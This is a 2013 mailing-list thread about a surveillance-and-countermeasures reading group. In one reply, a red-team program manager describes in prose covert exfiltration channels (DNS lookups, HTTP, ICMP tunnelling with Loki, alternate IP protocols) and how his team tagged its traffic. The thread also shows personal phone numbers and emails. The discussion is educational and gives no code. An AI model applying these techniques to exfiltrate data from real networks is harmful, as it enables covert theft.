Ray -
Great real-world report... my direct experience in all this is dated by
at least 6 years, but most of it nearly 10 years old now... time flies!
The only question I have about your response below is about the question
of bandwidth... while *some* important data/secrets are large, many are
not... a leak is a leak, no? And an effective (albeit low bandwidth)
covert channel can leak a LOT over enough time?
- Steve
WRT the Covert Channels paper -
Header extensions and IP options are not actually practical
channels. They sound good but in practice they run afoul of the
problem that network equipment, particularly routers, process packets
in hardware - unless they have unusual extensions or IP Options, in
which case the packets are thrown up to the software layer. That
means they will be slower, all through the Internet, and they are
easily detected.
We've used the IPID trick but not for a cover channel. We wanted to
be able to distinguish our traffic from actual attackers (use control
for red teams), so we created an HMAC of the packet and inserted the
first few bytes into the IPID field. At the target's end, they can
use a tool fed from tcpdump or other appropriate tool and check
whether the IPID bytes match our expected value - we use a shared
secret salt.
Most of the other tricks are low bandwidth - not really useful for
gigabytes of information.
The two most commonly used covert channels in current malware are
http and DNS. The sheer volume of http makes it impractical to catch
all requests - many typical, public, web-pages include requests to
dozens of web-sites other than the primary one. The many web-bug
tricks and advertising spyware activities make this a really large
pool of bits in which an adversary can hide. We've used the trick of
sending data out as DNS lookups against customer networks and it works
like a charm. We literally showed a security manager (later the CISO
for the organization) the exfiltration and he didn't believe it twice,
despite the evidence of displaying the exfiltrated file on our
external web-site.
I have a copy of the Loki source code (very clean) and sending
unrequested ICPM echo responses still works in some places. The
author of Loki, who went by the name Mixter, created another covert
channel that simply uses alternate IP protocols. Some routers will
route any IP protocol by default while others will only route those IP
protocols explicitly specified.
Ray Parks
Consilient Heuristician/IDART Program Manager
V: 505-844-4024 M: 505-238-9359 P: 505-951-6084
NIPR: rcpa...@sandia.gov <mailto:rcpa...@sandia.gov>
SIPR: rcpar...@sandia.doe.sgov.gov
<mailto:rcpar...@sandia.doe.sgov.gov> (send NIPR reminder)
JWICS: dopa...@doe.ic.gov <mailto:dopa...@doe.ic.gov> (send NIPR reminder)
On Oct 18, 2013, at 8:27 PM, Steve Smith wrote:
Forgot to relate the tidbit that motivated me to update the group:
The "Covert Channels" reading, which is a very specialized example of
Steganography (by my measure) has some very clever ideas in it which
I'd never encountered before... all kind of obvious once described
but nevertheless quite clever.
- Steve
I don't know if anyone (else) is doing the reading for this course....
I lagged a bit but am just now catching up... the first 5 readings
were history/law and *very* timely and relevant to the current
situation with the NSA, etc.
The following are more technical:
Secure Email
Tor (secure - obfuscated?) Routing
Network Traffic Analysis
Steganography
Covert Channels
Chat (off the record)
.....
I've done my time working with or studying all of these at a fairly
limited level and found each of the resources offered to be very
well chosen... a good review for me and a good introduction for
anyone with modest technical knowledge. They are also "bite
sized"... I find the reading assignment for each week requiring less
than an hour, though one can use these as a point of departure that
could consume a whole week!
I'm glad to hear that our best and brightest are being taught these
things.
- Steve
I'm in. A number of journos are interested in/worried about this.
-tj
On Mon, Sep 9, 2013 at 12:30 PM, Steve Smith <sasm...@swcp.com
<mailto:sasm...@swcp.com>> wrote:
Cody -
I think you just started one (by asking).
I suggest a Google Group for discussion and following the class
schedule even if we don't have the benefit of lecture and class
discussions.
3 or more is a good number... if Owen's alerting us indicates
interest, we already have a Quorum!?
- Steve
that seems like a very cool reading list. Are you thinking of
starting up a reading group?
Cody Smith
On Mon, Sep 9, 2013 at 10:09 AM, Owen Densmore
<o...@backspaces.net <mailto:o...@backspaces.net>> wrote:
Another gem from twitter:
Ed Felten
Preliminary syllabus for my "Surveillance and
Countermeasures" seminar: http://ow.ly/oHs9a
<http://ow.ly/oHs9a>
Retweeted by BrendanEich
http://www.cs.princeton.edu/courses/archive/fall13/cos597G/
Sounds fascinating .. and not all tech, lots of history
and spy craft.
-- Owen
============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe
http://redfish.com/mailman/listinfo/friam_redfish.com
============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribehttp://redfish.com/mailman/listinfo/friam_redfish.com
============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe
http://redfish.com/mailman/listinfo/friam_redfish.com
--
==========================================
J. T. Johnson
Institute for Analytic Journalism -- Santa Fe, NM USA
505.577.6482(c) 505.473.9646(h)
Twitter: jtjohnson
http://www.jtjohnson.com <http://www.jtjohnson.com/>
t...@jtjohnson.com <mailto:t...@jtjohnson.com>
==========================================
============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribehttp://redfish.com/mailman/listinfo/friam_redfish.com
============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribehttp://redfish.com/mailman/listinfo/friam_redfish.com
============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com
============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com
============================================================
FRIAM Applied Complexity Group listserv
Meets Fridays 9a-11:30 at cafe at St. John's College
to unsubscribe http://redfish.com/mailman/listinfo/friam_redfish.com